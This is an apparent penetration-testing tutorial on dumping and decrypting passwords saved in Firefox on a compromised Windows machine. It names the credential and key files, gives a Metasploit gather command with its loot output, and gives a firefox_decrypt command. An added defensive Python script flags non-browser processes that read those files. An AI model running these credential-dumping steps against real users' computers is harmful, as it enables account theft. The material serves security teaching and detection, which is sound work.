Situation
Retrieving stored passwords from web browsers like Mozilla Firefox and Google Chrome is part of the post-exploitation methodology. Attackers with backdoor access to a compromised computer can easily dump and decrypt credentials stored in web browsers.
Solution
Steps to follow
Mozilla Firefox's built-in password manager stores encrypted credentials in “logins.json”. The credentials in logins.json are encrypted with a key that is stored in the “key4.db” file. Both of these files are located in the Firefox profile directory on Windows:
%LocalAppData%\Mozilla\Firefox\Profiles\randomString.Default\logins.json
There’s an MSF module which we’ll use to dump Firefox stored passwords on a compromised computer.
Module: firefox_creds
run post/multi/gather/firefox_creds
[+] Downloaded cert9.db: /root/.msf4/loot/20200927050238_default_10.10.78.147_ff.ljfn812a.cert_254315.bin
[+] Downloaded cookies.sqlite: /root/.msf4/loot/20200927050241_default_10.10.78.147_ff.ljfn812a.cook_800633.bin
[+] Downloaded key4.db: /root/.msf4/loot/20200927050253_default_10.10.78.147_ff.ljfn812a.key4_784345.bin
[+] Downloaded logins.json: /root/.msf4/loot/20200927050257_default_10.10.78.147_ff.ljfn812a.logi_176246.bin
This module has downloaded 4 files for us, but you can also download them manually.
These files have been saved with a .bin extension; just rename them back to their original extensions.
As you know, the credentials are encrypted, so now we have to decrypt them.
Decrypting Stored Passwords in Mozilla Firefox
Download firefox_decrypt to your local machine and run the script: git clone
There’s a manual in the GitHub repo you can follow. Let’s decrypt our credentials.
python firefox_decrypt.py /root/.msf4/loot
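For defenders, the two file names above give a concrete detection point: any process other than the browser itself opening logins.json or key4.db. The following is an added example, not part of the original page. It assumes file-access auditing is enabled on the profile folder so that Windows Security event 4663 is logged, that events are already parsed into dictionaries with the ObjectName and ProcessName fields, and that Firefox is installed at the default path.

```python
import re

# File names from this page; the regex matches them inside any Firefox profile folder.
STORE_RE = re.compile(
    r"\\Mozilla\\Firefox\\Profiles\\[^\\]+\\(logins\.json|key4\.db)$", re.IGNORECASE)

# Assumption: the only image expected to open these files (default install path).
# Matching the full path, not just the name, catches a tool renamed to firefox.exe.
ALLOWED_IMAGES = {r"c:\program files\mozilla firefox\firefox.exe"}

def suspicious_reads(events):
    """Return (image, file) for each 4663 event where a non-browser image
    accessed logins.json or key4.db."""
    hits = []
    for ev in events:
        if ev.get("EventID") != 4663:
            continue
        m = STORE_RE.search(ev.get("ObjectName", ""))
        if not m:
            continue
        image = ev.get("ProcessName", "")
        if image.lower() not in ALLOWED_IMAGES:
            hits.append((image, m.group(1).lower()))
    return hits

# Constructed sample events (not taken from a real host).
PROFILE = r"C:\Users\alice\AppData\Local\Mozilla\Firefox\Profiles\abcd1234.Default"
SAMPLE_EVENTS = [
    {"EventID": 4663, "ProcessName": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "ObjectName": PROFILE + r"\logins.json"},
    {"EventID": 4663, "ProcessName": r"C:\Users\alice\AppData\Local\Temp\svc.exe",
     "ObjectName": PROFILE + r"\key4.db"},
    {"EventID": 4663, "ProcessName": r"C:\Users\alice\AppData\Local\Temp\firefox.exe",
     "ObjectName": PROFILE + r"\logins.json"},
    {"EventID": 4663, "ProcessName": r"C:\Users\alice\AppData\Local\Temp\svc.exe",
     "ObjectName": PROFILE + r"\places.sqlite"},
]

if __name__ == "__main__":
    for image, name in suspicious_reads(SAMPLE_EVENTS):
        print(f"ALERT: {image} accessed {name}")
```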